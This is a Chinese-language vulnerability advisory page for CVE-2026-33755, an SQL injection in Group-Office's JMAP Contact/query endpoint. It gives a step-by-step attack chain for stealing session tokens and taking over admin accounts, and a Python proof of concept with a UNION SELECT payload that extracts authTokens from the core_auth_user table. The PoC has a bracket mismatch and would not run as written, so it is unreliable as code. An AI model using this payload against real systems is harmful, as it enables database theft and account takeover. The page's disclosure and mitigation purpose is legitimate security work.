CVE-2026-33755 CVSS 8.8 高危

CVE-2026-33755 Group-Office SQL注入漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33755

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Group-Office

漏洞概述

Group-Office是一款企业级CRM与群件解决方案。在特定版本之前，其JMAP Contact/query端点存在SQL注入漏洞。拥有基本地址簿权限的认证攻击者可利用该漏洞窃取数据库中的任意数据，包括其他用户的会话令牌，从而无需密码即可接管包括系统管理员在内的任意账户，造成严重数据泄露与控制权丧失。

技术细节

该漏洞的根本原因在于Group-Office在处理JMAP协议的Contact/query端点请求时，对用户提供的参数未实施充分的输入验证和参数化查询处理。攻击者只需具备低权限的地址簿访问账号，即可向该接口发送特制的数据包。通过在查询参数中插入恶意的SQL语句，攻击者能够操纵后端数据库执行非预期的命令。利用方式通常包括布尔盲注或基于UNION的查询，以读取数据库结构及敏感字段。最关键的利用目标是提取存储在数据库中的用户认证凭证（如会话令牌或哈希）。一旦获取到系统管理员或其他高权限用户的Session Token，攻击者即可将其用于后续的HTTP请求中，从而绕过正常的身份验证流程，直接获得目标账户的完全控制权，进而执行任意管理操作。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是Group-Office，并确定JMAP接口可访问。

STEP 2

获取低权限账号

攻击者注册一个普通账户或使用已有的低权限账户，只需具备基本的地址簿访问权限。

STEP 3

构造并发送恶意载荷

攻击者向Contact/query端点发送特制的JMAP请求，在filter参数中注入SQL语句。

STEP 4

数据提取

利用SQL注入漏洞，攻击者从数据库中检索敏感信息，特别是管理员或其他用户的会话令牌。

STEP 5

账户接管

攻击者使用窃取的会话令牌替换自己的Cookie，以受害者身份登录，完全接管账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration
url = "https://target-groupoffice.com/jmap"
attacker_session = "low_privilege_session_cookie"

# Headers
headers = {
    "Content-Type": "application/json",
    "Cookie": f"GO_SID={attacker_session}"
}

# Malicious JMAP payload to exploit SQLi in Contact/query
# This payload attempts to extract auth_token from the database
payload = {
    "using": ["urn:ietf:params:jmap:contacts"],
    "methodCalls": [
        [
            "Contact/query",
            {
                "accountId": "1",
                "filter": {
                    # The injection point: 'text' field
                    "text": "x' UNION SELECT NULL, NULL, authToken, NULL FROM core_auth_user-- "
                }
            },
            "c1"
        ]
    }

# Send the exploit request
response = requests.post(url, headers=headers, data=json.dumps(payload))

# Check if data is leaked
if response.status_code == 200:
    print("[+] Request sent successfully")
    print("[+] Response:")
    print(response.json())
else:
    print("[-] Exploit failed or target is not vulnerable")

影响范围

Group-Office < 6.8.158

Group-Office < 25.0.92

Group-Office < 26.0.17

防御指南

临时缓解措施

建议立即升级至修复版本。如无法立即修补，应临时禁用JMAP Contact/query接口或严格限制网络访问来源，仅允许受信任的IP地址访问，同时监控数据库异常查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表